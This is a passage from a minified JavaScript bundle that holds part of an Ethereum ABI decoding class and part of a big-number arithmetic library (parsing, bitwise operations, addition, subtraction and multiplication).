                            })), o.push(!0)) : (n.push(e), o.push(!1)) : (i.push(e), o.push(!1));
                        });
                        let s = null != r ? this._abiCoder.decode(n, A(r)) : null, a = this._abiCoder.decode(i, t, !0), u = [], c = 0, l = 0;
                        e.inputs.forEach((e, t)=>{
                            if (e.indexed) {
                                if (null == s) u[t] = new ct({
                                    _isIndexed: !0,
                                    hash: null
                                });
                                else if (o[t]) u[t] = new ct({
                                    _isIndexed: !0,
                                    hash: s[l++]
                                });
                                else try {
                                    u[t] = s[l++];
                                } catch (e) {
                                    u[t] = e;
                                }
                            } else try {
                                u[t] = a[c++];
                            } catch (e) {
                                u[t] = e;
                            }
                            if (e.name && null == u[e.name]) {
                                const r = u[t];
                                r instanceof Error ? Object.defineProperty(u, e.name, {
                                    enumerable: !0,
                                    get: ()=>{
                                        throw dt(`property ${JSON.stringify(e.name)}`, r);
                                    }
                                }) : u[e.name] = r;
                            }
                        });
                        for(let e = 0; e < u.length; e++){
                            const t = u[e];
                            t instanceof Error && Object.defineProperty(u, e, {
                                enumerable: !0,
                                get: ()=>{
                                    throw dt(`index ${e}`, t);
                                }
                            });
                        }
                        return Object.freeze(u);
                    }
                    parseTransaction(e) {
                        let t = this.getFunction(e.data.substring(0, 10).toLowerCase());
                        return t ? new at({
                            args: this._abiCoder.decode(t.inputs, "0x" + e.data.substring(10)),
                            functionFragment: t,
                            name: t.name,
                            signature: t.format(),
                            sighash: this.getSighash(t),
                            value: M.from(e.value || "0")
                        }) : null;
                    }
                    parseLog(e) {
                        let t = this.getEvent(e.topics[0]);
                        return !t || t.anonymous ? null : new st({
                            eventFragment: t,
                            name: t.name,
                            signature: t.format(),
                            topic: this.getEventTopic(t),
                            args: this.decodeEventLog(t, e.data, e.topics)
                        });
                    }
                    parseError(e) {
                        const t = T(e);
                        let r = this.getError(t.substring(0, 10).toLowerCase());
                        return r ? new ut({
                            args: this._abiCoder.decode(r.inputs, "0x" + t.substring(10)),
                            errorFragment: r,
                            name: r.name,
                            signature: r.format(),
                            sighash: this.getSighash(r)
                        }) : null;
                    }
                    static isInterface(e) {
                        return !(!e || !e._isInterface);
                    }
                }
            },
            4269: function(e, t, r) {
                !function(e, t) {
                    "use strict";
                    function n(e, t) {
                        if (!e) throw new Error(t || "Assertion failed");
                    }
                    function i(e, t) {
                        e.super_ = t;
                        var r = function() {};
                        r.prototype = t.prototype, e.prototype = new r, e.prototype.constructor = e;
                    }
                    function o(e, t, r) {
                        if (o.isBN(e)) return e;
                        this.negative = 0, this.words = null, this.length = 0, this.red = null, null !== e && ("le" !== t && "be" !== t || (r = t, t = 10), this._init(e || 0, t || 10, r || "be"));
                    }
                    var s;
                    "object" == typeof e ? e.exports = o : t.BN = o, o.BN = o, o.wordSize = 26;
                    try {
                        s = "undefined" != typeof window && void 0 !== window.Buffer ? window.Buffer : r(9005).Buffer;
                    } catch (e) {}
                    function a(e, t) {
                        var r = e.charCodeAt(t);
                        return r >= 48 && r <= 57 ? r - 48 : r >= 65 && r <= 70 ? r - 55 : r >= 97 && r <= 102 ? r - 87 : void n(!1, "Invalid character in " + e);
                    }
                    function u(e, t, r) {
                        var n = a(e, r);
                        return r - 1 >= t && (n |= a(e, r - 1) << 4), n;
                    }
                    function c(e, t, r, i) {
                        for(var o = 0, s = 0, a = Math.min(e.length, r), u = t; u < a; u++){
                            var c = e.charCodeAt(u) - 48;
                            o *= i, s = c >= 49 ? c - 49 + 10 : c >= 17 ? c - 17 + 10 : c, n(c >= 0 && s < i, "Invalid character"), o += s;
                        }
                        return o;
                    }
                    function l(e, t) {
                        e.words = t.words, e.length = t.length, e.negative = t.negative, e.red = t.red;
                    }
                    if (o.isBN = function(e) {
                        return e instanceof o || null !== e && "object" == typeof e && e.constructor.wordSize === o.wordSize && Array.isArray(e.words);
                    }, o.max = function(e, t) {
                        return e.cmp(t) > 0 ? e : t;
                    }, o.min = function(e, t) {
                        return e.cmp(t) < 0 ? e : t;
                    }, o.prototype._init = function(e, t, r) {
                        if ("number" == typeof e) return this._initNumber(e, t, r);
                        if ("object" == typeof e) return this._initArray(e, t, r);
                        "hex" === t && (t = 16), n(t === (0 | t) && t >= 2 && t <= 36);
                        var i = 0;
                        "-" === (e = e.toString().replace(/\s+/g, ""))[0] && (i++, this.negative = 1), i < e.length && (16 === t ? this._parseHex(e, i, r) : (this._parseBase(e, t, i), "le" === r && this._initArray(this.toArray(), t, r)));
                    }, o.prototype._initNumber = function(e, t, r) {
                        e < 0 && (this.negative = 1, e = -e), e < 67108864 ? (this.words = [
                            67108863 & e
                        ], this.length = 1) : e < 4503599627370496 ? (this.words = [
                            67108863 & e,
                            e / 67108864 & 67108863
                        ], this.length = 2) : (n(e < 9007199254740992), this.words = [
                            67108863 & e,
                            e / 67108864 & 67108863,
                            1
                        ], this.length = 3), "le" === r && this._initArray(this.toArray(), t, r);
                    }, o.prototype._initArray = function(e, t, r) {
                        if (n("number" == typeof e.length), e.length <= 0) return this.words = [
                            0
                        ], this.length = 1, this;
                        this.length = Math.ceil(e.length / 3), this.words = new Array(this.length);
                        for(var i = 0; i < this.length; i++)this.words[i] = 0;
                        var o, s, a = 0;
                        if ("be" === r) for(i = e.length - 1, o = 0; i >= 0; i -= 3)s = e[i] | e[i - 1] << 8 | e[i - 2] << 16, this.words[o] |= s << a & 67108863, this.words[o + 1] = s >>> 26 - a & 67108863, (a += 24) >= 26 && (a -= 26, o++);
                        else if ("le" === r) for(i = 0, o = 0; i < e.length; i += 3)s = e[i] | e[i + 1] << 8 | e[i + 2] << 16, this.words[o] |= s << a & 67108863, this.words[o + 1] = s >>> 26 - a & 67108863, (a += 24) >= 26 && (a -= 26, o++);
                        return this._strip();
                    }, o.prototype._parseHex = function(e, t, r) {
                        this.length = Math.ceil((e.length - t) / 6), this.words = new Array(this.length);
                        for(var n = 0; n < this.length; n++)this.words[n] = 0;
                        var i, o = 0, s = 0;
                        if ("be" === r) for(n = e.length - 1; n >= t; n -= 2)i = u(e, t, n) << o, this.words[s] |= 67108863 & i, o >= 18 ? (o -= 18, s += 1, this.words[s] |= i >>> 26) : o += 8;
                        else for(n = (e.length - t) % 2 == 0 ? t + 1 : t; n < e.length; n += 2)i = u(e, t, n) << o, this.words[s] |= 67108863 & i, o >= 18 ? (o -= 18, s += 1, this.words[s] |= i >>> 26) : o += 8;
                        this._strip();
                    }, o.prototype._parseBase = function(e, t, r) {
                        this.words = [
                            0
                        ], this.length = 1;
                        for(var n = 0, i = 1; i <= 67108863; i *= t)n++;
                        n--, i = i / t | 0;
                        for(var o = e.length - r, s = o % n, a = Math.min(o, o - s) + r, u = 0, l = r; l < a; l += n)u = c(e, l, l + n, t), this.imuln(i), this.words[0] + u < 67108864 ? this.words[0] += u : this._iaddn(u);
                        if (0 !== s) {
                            var d = 1;
                            for(u = c(e, l, e.length, t), l = 0; l < s; l++)d *= t;
                            this.imuln(d), this.words[0] + u < 67108864 ? this.words[0] += u : this._iaddn(u);
                        }
                        this._strip();
                    }, o.prototype.copy = function(e) {
                        e.words = new Array(this.length);
                        for(var t = 0; t < this.length; t++)e.words[t] = this.words[t];
                        e.length = this.length, e.negative = this.negative, e.red = this.red;
                    }, o.prototype._move = function(e) {
                        l(e, this);
                    }, o.prototype.clone = function() {
                        var e = new o(null);
                        return this.copy(e), e;
                    }, o.prototype._expand = function(e) {
                        for(; this.length < e;)this.words[this.length++] = 0;
                        return this;
                    }, o.prototype._strip = function() {
                        for(; this.length > 1 && 0 === this.words[this.length - 1];)this.length--;
                        return this._normSign();
                    }, o.prototype._normSign = function() {
                        return 1 === this.length && 0 === this.words[0] && (this.negative = 0), this;
                    }, "undefined" != typeof Symbol && "function" == typeof Symbol.for) try {
                        o.prototype[Symbol.for("nodejs.util.inspect.custom")] = d;
                    } catch (e) {
                        o.prototype.inspect = d;
                    }
                    else o.prototype.inspect = d;
                    function d() {
                        return (this.red ? "<BN-R: " : "<BN: ") + this.toString(16) + ">";
                    }
                    var h = [
                        "",
                        "0",
                        "00",
                        "000",
                        "0000",
                        "00000",
                        "000000",
                        "0000000",
                        "00000000",
                        "000000000",
                        "0000000000",
                        "00000000000",
                        "000000000000",
                        "0000000000000",
                        "00000000000000",
                        "000000000000000",
                        "0000000000000000",
                        "00000000000000000",
                        "000000000000000000",
                        "0000000000000000000",
                        "00000000000000000000",
                        "000000000000000000000",
                        "0000000000000000000000",
                        "00000000000000000000000",
                        "000000000000000000000000",
                        "0000000000000000000000000"
                    ], f = [
                        0,
                        0,
                        25,
                        16,
                        12,
                        11,
                        10,
                        9,
                        8,
                        8,
                        7,
                        7,
                        7,
                        7,
                        6,
                        6,
                        6,
                        6,
                        6,
                        6,
                        6,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5,
                        5
                    ], p = [
                        0,
                        0,
                        33554432,
                        43046721,
                        16777216,
                        48828125,
                        60466176,
                        40353607,
                        16777216,
                        43046721,
                        1e7,
                        19487171,
                        35831808,
                        62748517,
                        7529536,
                        11390625,
                        16777216,
                        24137569,
                        34012224,
                        47045881,
                        64e6,
                        4084101,
                        5153632,
                        6436343,
                        7962624,
                        9765625,
                        11881376,
                        14348907,
                        17210368,
                        20511149,
                        243e5,
                        28629151,
                        33554432,
                        39135393,
                        45435424,
                        52521875,
                        60466176
                    ];
                    function m(e, t, r) {
                        r.negative = t.negative ^ e.negative;
                        var n = e.length + t.length | 0;
                        r.length = n, n = n - 1 | 0;
                        var i = 0 | e.words[0], o = 0 | t.words[0], s = i * o, a = 67108863 & s, u = s / 67108864 | 0;
                        r.words[0] = a;
                        for(var c = 1; c < n; c++){
                            for(var l = u >>> 26, d = 67108863 & u, h = Math.min(c, t.length - 1), f = Math.max(0, c - e.length + 1); f <= h; f++){
                                var p = c - f | 0;
                                l += (s = (i = 0 | e.words[p]) * (o = 0 | t.words[f]) + d) / 67108864 | 0, d = 67108863 & s;
                            }
                            r.words[c] = 0 | d, u = 0 | l;
                        }
                        return 0 !== u ? r.words[c] = 0 | u : r.length--, r._strip();
                    }
                    o.prototype.toString = function(e, t) {
                        var r;
                        if (t = 0 | t || 1, 16 === (e = e || 10) || "hex" === e) {
                            r = "";
                            for(var i = 0, o = 0, s = 0; s < this.length; s++){
                                var a = this.words[s], u = (16777215 & (a << i | o)).toString(16);
                                o = a >>> 24 - i & 16777215, (i += 2) >= 26 && (i -= 26, s--), r = 0 !== o || s !== this.length - 1 ? h[6 - u.length] + u + r : u + r;
                            }
                            for(0 !== o && (r = o.toString(16) + r); r.length % t != 0;)r = "0" + r;
                            return 0 !== this.negative && (r = "-" + r), r;
                        }
                        if (e === (0 | e) && e >= 2 && e <= 36) {
                            var c = f[e], l = p[e];
                            r = "";
                            var d = this.clone();
                            for(d.negative = 0; !d.isZero();){
                                var m = d.modrn(l).toString(e);
                                r = (d = d.idivn(l)).isZero() ? m + r : h[c - m.length] + m + r;
                            }
                            for(this.isZero() && (r = "0" + r); r.length % t != 0;)r = "0" + r;
                            return 0 !== this.negative && (r = "-" + r), r;
                        }
                        n(!1, "Base should be between 2 and 36");
                    }, o.prototype.toNumber = function() {
                        var e = this.words[0];
                        return 2 === this.length ? e += 67108864 * this.words[1] : 3 === this.length && 1 === this.words[2] ? e += 4503599627370496 + 67108864 * this.words[1] : this.length > 2 && n(!1, "Number can only safely store up to 53 bits"), 0 !== this.negative ? -e : e;
                    }, o.prototype.toJSON = function() {
                        return this.toString(16, 2);
                    }, s && (o.prototype.toBuffer = function(e, t) {
                        return this.toArrayLike(s, e, t);
                    }), o.prototype.toArray = function(e, t) {
                        return this.toArrayLike(Array, e, t);
                    }, o.prototype.toArrayLike = function(e, t, r) {
                        this._strip();
                        var i = this.byteLength(), o = r || Math.max(1, i);
                        n(i <= o, "byte array longer than desired length"), n(o > 0, "Requested array length <= 0");
                        var s = function(e, t) {
                            return e.allocUnsafe ? e.allocUnsafe(t) : new e(t);
                        }(e, o);
                        return this["_toArrayLike" + ("le" === t ? "LE" : "BE")](s, i), s;
                    }, o.prototype._toArrayLikeLE = function(e, t) {
                        for(var r = 0, n = 0, i = 0, o = 0; i < this.length; i++){
                            var s = this.words[i] << o | n;
                            e[r++] = 255 & s, r < e.length && (e[r++] = s >> 8 & 255), r < e.length && (e[r++] = s >> 16 & 255), 6 === o ? (r < e.length && (e[r++] = s >> 24 & 255), n = 0, o = 0) : (n = s >>> 24, o += 2);
                        }
                        if (r < e.length) for(e[r++] = n; r < e.length;)e[r++] = 0;
                    }, o.prototype._toArrayLikeBE = function(e, t) {
                        for(var r = e.length - 1, n = 0, i = 0, o = 0; i < this.length; i++){
                            var s = this.words[i] << o | n;
                            e[r--] = 255 & s, r >= 0 && (e[r--] = s >> 8 & 255), r >= 0 && (e[r--] = s >> 16 & 255), 6 === o ? (r >= 0 && (e[r--] = s >> 24 & 255), n = 0, o = 0) : (n = s >>> 24, o += 2);
                        }
                        if (r >= 0) for(e[r--] = n; r >= 0;)e[r--] = 0;
                    }, Math.clz32 ? o.prototype._countBits = function(e) {
                        return 32 - Math.clz32(e);
                    } : o.prototype._countBits = function(e) {
                        var t = e, r = 0;
                        return t >= 4096 && (r += 13, t >>>= 13), t >= 64 && (r += 7, t >>>= 7), t >= 8 && (r += 4, t >>>= 4), t >= 2 && (r += 2, t >>>= 2), r + t;
                    }, o.prototype._zeroBits = function(e) {
                        if (0 === e) return 26;
                        var t = e, r = 0;
                        return 0 == (8191 & t) && (r += 13, t >>>= 13), 0 == (127 & t) && (r += 7, t >>>= 7), 0 == (15 & t) && (r += 4, t >>>= 4), 0 == (3 & t) && (r += 2, t >>>= 2), 0 == (1 & t) && r++, r;
                    }, o.prototype.bitLength = function() {
                        var e = this.words[this.length - 1], t = this._countBits(e);
                        return 26 * (this.length - 1) + t;
                    }, o.prototype.zeroBits = function() {
                        if (this.isZero()) return 0;
                        for(var e = 0, t = 0; t < this.length; t++){
                            var r = this._zeroBits(this.words[t]);
                            if (e += r, 26 !== r) break;
                        }
                        return e;
                    }, o.prototype.byteLength = function() {
                        return Math.ceil(this.bitLength() / 8);
                    }, o.prototype.toTwos = function(e) {
                        return 0 !== this.negative ? this.abs().inotn(e).iaddn(1) : this.clone();
                    }, o.prototype.fromTwos = function(e) {
                        return this.testn(e - 1) ? this.notn(e).iaddn(1).ineg() : this.clone();
                    }, o.prototype.isNeg = function() {
                        return 0 !== this.negative;
                    }, o.prototype.neg = function() {
                        return this.clone().ineg();
                    }, o.prototype.ineg = function() {
                        return this.isZero() || (this.negative ^= 1), this;
                    }, o.prototype.iuor = function(e) {
                        for(; this.length < e.length;)this.words[this.length++] = 0;
                        for(var t = 0; t < e.length; t++)this.words[t] = this.words[t] | e.words[t];
                        return this._strip();
                    }, o.prototype.ior = function(e) {
                        return n(0 == (this.negative | e.negative)), this.iuor(e);
                    }, o.prototype.or = function(e) {
                        return this.length > e.length ? this.clone().ior(e) : e.clone().ior(this);
                    }, o.prototype.uor = function(e) {
                        return this.length > e.length ? this.clone().iuor(e) : e.clone().iuor(this);
                    }, o.prototype.iuand = function(e) {
                        var t;
                        t = this.length > e.length ? e : this;
                        for(var r = 0; r < t.length; r++)this.words[r] = this.words[r] & e.words[r];
                        return this.length = t.length, this._strip();
                    }, o.prototype.iand = function(e) {
                        return n(0 == (this.negative | e.negative)), this.iuand(e);
                    }, o.prototype.and = function(e) {
                        return this.length > e.length ? this.clone().iand(e) : e.clone().iand(this);
                    }, o.prototype.uand = function(e) {
                        return this.length > e.length ? this.clone().iuand(e) : e.clone().iuand(this);
                    }, o.prototype.iuxor = function(e) {
                        var t, r;
                        this.length > e.length ? (t = this, r = e) : (t = e, r = this);
                        for(var n = 0; n < r.length; n++)this.words[n] = t.words[n] ^ r.words[n];
                        if (this !== t) for(; n < t.length; n++)this.words[n] = t.words[n];
                        return this.length = t.length, this._strip();
                    }, o.prototype.ixor = function(e) {
                        return n(0 == (this.negative | e.negative)), this.iuxor(e);
                    }, o.prototype.xor = function(e) {
                        return this.length > e.length ? this.clone().ixor(e) : e.clone().ixor(this);
                    }, o.prototype.uxor = function(e) {
                        return this.length > e.length ? this.clone().iuxor(e) : e.clone().iuxor(this);
                    }, o.prototype.inotn = function(e) {
                        n("number" == typeof e && e >= 0);
                        var t = 0 | Math.ceil(e / 26), r = e % 26;
                        this._expand(t), r > 0 && t--;
                        for(var i = 0; i < t; i++)this.words[i] = 67108863 & ~this.words[i];
                        return r > 0 && (this.words[i] = ~this.words[i] & 67108863 >> 26 - r), this._strip();
                    }, o.prototype.notn = function(e) {
                        return this.clone().inotn(e);
                    }, o.prototype.setn = function(e, t) {
                        n("number" == typeof e && e >= 0);
                        var r = e / 26 | 0, i = e % 26;
                        return this._expand(r + 1), this.words[r] = t ? this.words[r] | 1 << i : this.words[r] & ~(1 << i), this._strip();
                    }, o.prototype.iadd = function(e) {
                        var t, r, n;
                        if (0 !== this.negative && 0 === e.negative) return this.negative = 0, t = this.isub(e), this.negative ^= 1, this._normSign();
                        if (0 === this.negative && 0 !== e.negative) return e.negative = 0, t = this.isub(e), e.negative = 1, t._normSign();
                        this.length > e.length ? (r = this, n = e) : (r = e, n = this);
                        for(var i = 0, o = 0; o < n.length; o++)t = (0 | r.words[o]) + (0 | n.words[o]) + i, this.words[o] = 67108863 & t, i = t >>> 26;
                        for(; 0 !== i && o < r.length; o++)t = (0 | r.words[o]) + i, this.words[o] = 67108863 & t, i = t >>> 26;
                        if (this.length = r.length, 0 !== i) this.words[this.length] = i, this.length++;
                        else if (r !== this) for(; o < r.length; o++)this.words[o] = r.words[o];
                        return this;
                    }, o.prototype.add = function(e) {
                        var t;
                        return 0 !== e.negative && 0 === this.negative ? (e.negative = 0, t = this.sub(e), e.negative ^= 1, t) : 0 === e.negative && 0 !== this.negative ? (this.negative = 0, t = e.sub(this), this.negative = 1, t) : this.length > e.length ? this.clone().iadd(e) : e.clone().iadd(this);
                    }, o.prototype.isub = function(e) {
                        if (0 !== e.negative) {
                            e.negative = 0;
                            var t = this.iadd(e);
                            return e.negative = 1, t._normSign();
                        }
                        if (0 !== this.negative) return this.negative = 0, this.iadd(e), this.negative = 1, this._normSign();
                        var r, n, i = this.cmp(e);
                        if (0 === i) return this.negative = 0, this.length = 1, this.words[0] = 0, this;
                        i > 0 ? (r = this, n = e) : (r = e, n = this);
                        for(var o = 0, s = 0; s < n.length; s++)o = (t = (0 | r.words[s]) - (0 | n.words[s]) + o) >> 26, this.words[s] = 67108863 & t;
                        for(; 0 !== o && s < r.length; s++)o = (t = (0 | r.words[s]) + o) >> 26, this.words[s] = 67108863 & t;
                        if (0 === o && s < r.length && r !== this) for(; s < r.length; s++)this.words[s] = r.words[s];
                        return this.length = Math.max(this.length, s), r !== this && (this.negative = 1), this._strip();
                    }, o.prototype.sub = function(e) {
                        return this.clone().isub(e);
                    };
                    var g = function(e, t, r) {
                        var n, i, o, s = e.words, a = t.words, u = r.words, c = 0, l = 0 | s[0], d = 8191 & l, h = l >>> 13, f = 0 | s[1], p = 8191 & f, m = f >>> 13, g = 0 | s[2], y = 8191 & g, v = g >>> 13, b = 0 | s[3], E = 8191 & b, A = b >>> 13, _ = 0 | s[4], w = 8191 & _, T = _ >>> 13, R = 0 | s[5], I = 8191 & R, S = R >>> 13, P = 0 | s[6], O = 8191 & P, x = P >>> 13, M = 0 | s[7], B = 8191 & M, N = M >>> 13, C = 0 | s[8], k = 8191 & C, L = C >>> 13, F = 0 | s[9], D = 8191 & F, j = F >>> 13, U = 0 | a[0], H = 8191 & U, G = U >>> 13, V = 0 | a[1], W = 8191 & V, q = V >>> 13, z = 0 | a[2], Q = 8191 & z, K = z >>> 13, J = 0 | a[3], X = 8191 & J, Y = J >>> 13, Z = 0 | a[4], $ = 8191 & Z, ee = Z >>> 13, te = 0 | a[5], re = 8191 & te, ne = te >>> 13, ie = 0 | a[6], oe = 8191 & ie, se = ie >>> 13, ae = 0 | a[7], ue = 8191 & ae, ce = ae >>> 13, le = 0 | a[8], de = 8191 & le, he = le >>> 13, fe = 0 | a[9], pe = 8191 & fe, me = fe >>> 13;
                        r.negative = e.negative ^ t.negative, r.length = 19;
                        var ge = (c + (n = Math.imul(d, H)) | 0) + ((8191 & (i = (i = Math.imul(d, G)) + Math.imul(h, H) | 0)) << 13) | 0;
                        c = ((o = Math.imul(h, G)) + (i >>> 13) | 0) + (ge >>> 26) | 0, ge &= 67108863, n = Math.imul(p, H), i = (i = Math.imul(p, G)) + Math.imul(m, H) | 0, o = Math.imul(m, G);
                        var ye = (c + (n = n + Math.imul(d, W) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, q) | 0) + Math.imul(h, W) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, q) | 0) + (i >>> 13) | 0) + (ye >>> 26) | 0, ye &= 67108863, n = Math.imul(y, H), i = (i = Math.imul(y, G)) + Math.imul(v, H) | 0, o = Math.imul(v, G), n = n + Math.imul(p, W) | 0, i = (i = i + Math.imul(p, q) | 0) + Math.imul(m, W) | 0, o = o + Math.imul(m, q) | 0;
                        var ve = (c + (n = n + Math.imul(d, Q) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, K) | 0) + Math.imul(h, Q) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, K) | 0) + (i >>> 13) | 0) + (ve >>> 26) | 0, ve &= 67108863, n = Math.imul(E, H), i = (i = Math.imul(E, G)) + Math.imul(A, H) | 0, o = Math.imul(A, G), n = n + Math.imul(y, W) | 0, i = (i = i + Math.imul(y, q) | 0) + Math.imul(v, W) | 0, o = o + Math.imul(v, q) | 0, n = n + Math.imul(p, Q) | 0, i = (i = i + Math.imul(p, K) | 0) + Math.imul(m, Q) | 0, o = o + Math.imul(m, K) | 0;
                        var be = (c + (n = n + Math.imul(d, X) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, Y) | 0) + Math.imul(h, X) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, Y) | 0) + (i >>> 13) | 0) + (be >>> 26) | 0, be &= 67108863, n = Math.imul(w, H), i = (i = Math.imul(w, G)) + Math.imul(T, H) | 0, o = Math.imul(T, G), n = n + Math.imul(E, W) | 0, i = (i = i + Math.imul(E, q) | 0) + Math.imul(A, W) | 0, o = o + Math.imul(A, q) | 0, n = n + Math.imul(y, Q) | 0, i = (i = i + Math.imul(y, K) | 0) + Math.imul(v, Q) | 0, o = o + Math.imul(v, K) | 0, n = n + Math.imul(p, X) | 0, i = (i = i + Math.imul(p, Y) | 0) + Math.imul(m, X) | 0, o = o + Math.imul(m, Y) | 0;
                        var Ee = (c + (n = n + Math.imul(d, $) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, ee) | 0) + Math.imul(h, $) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, ee) | 0) + (i >>> 13) | 0) + (Ee >>> 26) | 0, Ee &= 67108863, n = Math.imul(I, H), i = (i = Math.imul(I, G)) + Math.imul(S, H) | 0, o = Math.imul(S, G), n = n + Math.imul(w, W) | 0, i = (i = i + Math.imul(w, q) | 0) + Math.imul(T, W) | 0, o = o + Math.imul(T, q) | 0, n = n + Math.imul(E, Q) | 0, i = (i = i + Math.imul(E, K) | 0) + Math.imul(A, Q) | 0, o = o + Math.imul(A, K) | 0, n = n + Math.imul(y, X) | 0, i = (i = i + Math.imul(y, Y) | 0) + Math.imul(v, X) | 0, o = o + Math.imul(v, Y) | 0, n = n + Math.imul(p, $) | 0, i = (i = i + Math.imul(p, ee) | 0) + Math.imul(m, $) | 0, o = o + Math.imul(m, ee) | 0;
                        var Ae = (c + (n = n + Math.imul(d, re) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, ne) | 0) + Math.imul(h, re) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, ne) | 0) + (i >>> 13) | 0) + (Ae >>> 26) | 0, Ae &= 67108863, n = Math.imul(O, H), i = (i = Math.imul(O, G)) + Math.imul(x, H) | 0, o = Math.imul(x, G), n = n + Math.imul(I, W) | 0, i = (i = i + Math.imul(I, q) | 0) + Math.imul(S, W) | 0, o = o + Math.imul(S, q) | 0, n = n + Math.imul(w, Q) | 0, i = (i = i + Math.imul(w, K) | 0) + Math.imul(T, Q) | 0, o = o + Math.imul(T, K) | 0, n = n + Math.imul(E, X) | 0, i = (i = i + Math.imul(E, Y) | 0) + Math.imul(A, X) | 0, o = o + Math.imul(A, Y) | 0, n = n + Math.imul(y, $) | 0, i = (i = i + Math.imul(y, ee) | 0) + Math.imul(v, $) | 0, o = o + Math.imul(v, ee) | 0, n = n + Math.imul(p, re) | 0, i = (i = i + Math.imul(p, ne) | 0) + Math.imul(m, re) | 0, o = o + Math.imul(m, ne) | 0;
                        var _e = (c + (n = n + Math.imul(d, oe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, se) | 0) + Math.imul(h, oe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, se) | 0) + (i >>> 13) | 0) + (_e >>> 26) | 0, _e &= 67108863, n = Math.imul(B, H), i = (i = Math.imul(B, G)) + Math.imul(N, H) | 0, o = Math.imul(N, G), n = n + Math.imul(O, W) | 0, i = (i = i + Math.imul(O, q) | 0) + Math.imul(x, W) | 0, o = o + Math.imul(x, q) | 0, n = n + Math.imul(I, Q) | 0, i = (i = i + Math.imul(I, K) | 0) + Math.imul(S, Q) | 0, o = o + Math.imul(S, K) | 0, n = n + Math.imul(w, X) | 0, i = (i = i + Math.imul(w, Y) | 0) + Math.imul(T, X) | 0, o = o + Math.imul(T, Y) | 0, n = n + Math.imul(E, $) | 0, i = (i = i + Math.imul(E, ee) | 0) + Math.imul(A, $) | 0, o = o + Math.imul(A, ee) | 0, n = n + Math.imul(y, re) | 0, i = (i = i + Math.imul(y, ne) | 0) + Math.imul(v, re) | 0, o = o + Math.imul(v, ne) | 0, n = n + Math.imul(p, oe) | 0, i = (i = i + Math.imul(p, se) | 0) + Math.imul(m, oe) | 0, o = o + Math.imul(m, se) | 0;
                        var we = (c + (n = n + Math.imul(d, ue) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, ce) | 0) + Math.imul(h, ue) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, ce) | 0) + (i >>> 13) | 0) + (we >>> 26) | 0, we &= 67108863, n = Math.imul(k, H), i = (i = Math.imul(k, G)) + Math.imul(L, H) | 0, o = Math.imul(L, G), n = n + Math.imul(B, W) | 0, i = (i = i + Math.imul(B, q) | 0) + Math.imul(N, W) | 0, o = o + Math.imul(N, q) | 0, n = n + Math.imul(O, Q) | 0, i = (i = i + Math.imul(O, K) | 0) + Math.imul(x, Q) | 0, o = o + Math.imul(x, K) | 0, n = n + Math.imul(I, X) | 0, i = (i = i + Math.imul(I, Y) | 0) + Math.imul(S, X) | 0, o = o + Math.imul(S, Y) | 0, n = n + Math.imul(w, $) | 0, i = (i = i + Math.imul(w, ee) | 0) + Math.imul(T, $) | 0, o = o + Math.imul(T, ee) | 0, n = n + Math.imul(E, re) | 0, i = (i = i + Math.imul(E, ne) | 0) + Math.imul(A, re) | 0, o = o + Math.imul(A, ne) | 0, n = n + Math.imul(y, oe) | 0, i = (i = i + Math.imul(y, se) | 0) + Math.imul(v, oe) | 0, o = o + Math.imul(v, se) | 0, n = n + Math.imul(p, ue) | 0, i = (i = i + Math.imul(p, ce) | 0) + Math.imul(m, ue) | 0, o = o + Math.imul(m, ce) | 0;
                        var Te = (c + (n = n + Math.imul(d, de) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, he) | 0) + Math.imul(h, de) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, he) | 0) + (i >>> 13) | 0) + (Te >>> 26) | 0, Te &= 67108863, n = Math.imul(D, H), i = (i = Math.imul(D, G)) + Math.imul(j, H) | 0, o = Math.imul(j, G), n = n + Math.imul(k, W) | 0, i = (i = i + Math.imul(k, q) | 0) + Math.imul(L, W) | 0, o = o + Math.imul(L, q) | 0, n = n + Math.imul(B, Q) | 0, i = (i = i + Math.imul(B, K) | 0) + Math.imul(N, Q) | 0, o = o + Math.imul(N, K) | 0, n = n + Math.imul(O, X) | 0, i = (i = i + Math.imul(O, Y) | 0) + Math.imul(x, X) | 0, o = o + Math.imul(x, Y) | 0, n = n + Math.imul(I, $) | 0, i = (i = i + Math.imul(I, ee) | 0) + Math.imul(S, $) | 0, o = o + Math.imul(S, ee) | 0, n = n + Math.imul(w, re) | 0, i = (i = i + Math.imul(w, ne) | 0) + Math.imul(T, re) | 0, o = o + Math.imul(T, ne) | 0, n = n + Math.imul(E, oe) | 0, i = (i = i + Math.imul(E, se) | 0) + Math.imul(A, oe) | 0, o = o + Math.imul(A, se) | 0, n = n + Math.imul(y, ue) | 0, i = (i = i + Math.imul(y, ce) | 0) + Math.imul(v, ue) | 0, o = o + Math.imul(v, ce) | 0, n = n + Math.imul(p, de) | 0, i = (i = i + Math.imul(p, he) | 0) + Math.imul(m, de) | 0, o = o + Math.imul(m, he) | 0;
                        var Re = (c + (n = n + Math.imul(d, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, me) | 0) + Math.imul(h, pe) | 0)) << 13) | 0;
